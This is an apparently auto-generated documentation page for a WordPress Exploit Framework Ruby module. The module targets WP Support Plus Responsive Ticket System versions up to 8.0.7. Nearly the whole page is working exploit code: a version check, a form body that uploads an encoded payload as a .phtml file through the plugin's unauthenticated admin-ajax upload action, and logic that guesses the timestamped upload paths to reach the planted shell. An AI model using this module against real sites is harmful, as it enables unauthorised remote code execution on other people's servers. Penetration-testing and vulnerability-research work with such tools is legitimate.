class Wpxf::Exploit::WPSupportPlusResponsiveTicketSystemShellUpload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 6 def initialize super update_info( name: 'WP Support Plus Responsive Ticket System <= 8.0.7 Unauthenticated Shell Upload', author: [ 'Robert Mathews', # Discovery and disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8949'] ], date: 'Nov 11 2017' ) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 22 def check check_plugin_version_from_readme('wp-support-plus-responsive-ticket-system', '8.0.8') end
payload_body_builder()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 34 def payload_body_builder builder = Utility::BodyBuilder.new builder.add_field('action', 'wpsp_upload_attachment') builder.add_file_from_string('0', payload.encoded, payload_name) builder end
payload_name_extension()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 30 def payload_name_extension 'phtml' end
possible_payload_upload_locations()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 41 def possible_payload_upload_locations upload_timestamp_range.map do |timestamp| normalize_uri(wordpress_url_uploads, 'wpsp', "#{timestamp}_#{payload_name}") end end
uploader_url()
click to toggle source
# File lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb, line 26 def uploader_url wordpress_url_admin_ajax end